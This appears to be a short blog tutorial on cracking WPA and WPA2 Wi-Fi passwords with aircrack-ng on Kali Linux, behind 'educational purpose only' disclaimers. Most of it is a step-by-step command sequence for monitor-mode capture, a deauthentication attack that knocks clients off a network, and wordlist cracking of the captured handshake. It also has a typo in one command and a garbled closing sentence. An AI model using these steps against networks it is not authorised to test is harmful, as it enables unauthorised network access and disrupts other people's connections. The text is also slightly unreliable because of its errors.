Aircrack-ng best WiFi penetration testing tool used by hackers. In this tutorial we are going to teach you How to Crack WPA & WPA 2 with aircrack-ng on Kali Linux. We high recommend this for research or educational purpose only.
Top 10 WiFi Hacking Tools Used by Hackers
This tutorial is only for educational purpose. Use this tool at your own risks, we are not responsible for any damage that cause you.
Things we used for Cracking WPA & WPA2:
- Alfa AWUSO36H Wireless Card
- Windows 7-64bit (works on 32bit)
- VMware Workstation
- Kali Linux 2.0
Command to Crack WPA & WPA2:
airmon-ng
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
airodump-ng wlan0
airodump-ng -c [channel id] --write [any name] --bssid [bssid of the wifi] wlan0
aireplay-ng --deauth 5 -a [bssid] -c [station id] wlan0
aircrack-ng -w [wordlist file] -b [bssid] [any name]-01.cap
sudo ifconfig wlan0 down
sudo iwcofnig wlan0 mode monitor
sudo ifconfig wlan0 up
Here is a YouTube video on How to Crack WPA and WPA2 with Aircrack-ng on Kali Linux:
In the about tutorial we EVER hack our own systems as a proof of concept and never engage in any black hat activity.
6 comments
Comments are closed.
Add Comment